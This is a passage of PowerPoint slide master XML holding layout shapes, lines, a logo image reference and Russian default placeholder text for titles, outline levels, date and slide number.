          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 2" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="dt" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2130120" cy="453600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="-213840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>14.05.20</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 3" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="sldNum" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2130120" cy="453600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="-213840" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{367208AB-FB9B-4306-9608-9FE9DEC8F18F}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 4"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r>
              <a:rPr lang="en-GB" sz="3900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8229240" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="432000" indent="-324000">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для правки структуры щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="864000" lvl="1" indent="-324000">
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Второй уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1296000" lvl="2" indent="-288000">
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Третий уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1728000" lvl="3" indent="-216000">
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Четвёртый уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2160000" lvl="4" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пятый уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2592000" lvl="5" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Шестой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3024000" lvl="6" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>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3124080" y="6248520"/>
            <a:ext cx="2895120" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Line 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Line 3" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 8" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1257120" cy="1190160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PlaceHolder 4" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="dt" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2130120" cy="453600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="-213840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>14.05.20</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="sldNum" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2130120" cy="453600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="-213840" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{482A134C-F028-4A8C-8780-6871D630D6DA}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="PlaceHolder 6" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="title" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="273600"/>
            <a:ext cx="8229240" cy="1144800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="PlaceHolder 7" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8229240" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="432000" indent="-324000">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для правки структуры щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="864000" lvl="1" indent="-324000">
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Второй уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1296000" lvl="2" indent="-288000">
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Третий уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1728000" lvl="3" indent="-216000">
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Четвёртый уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2160000" lvl="4" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пятый уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2592000" lvl="5" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Шестой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3024000" lvl="6" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" bg1="lt1" bg2="lt2" folHlink="folHlink" hlink="hlink" tx1="dk1" tx2="dk2"/>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sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3.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3124080" y="6248520"/>
            <a:ext cx="2895120" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Line 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Line 3" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 8" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1257120" cy="1190160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PlaceHolder 4" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="title" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468360" y="115920"/>
            <a:ext cx="7124400" cy="1149120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Образец заголовка</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="4036680" cy="4408200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Образец текста</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
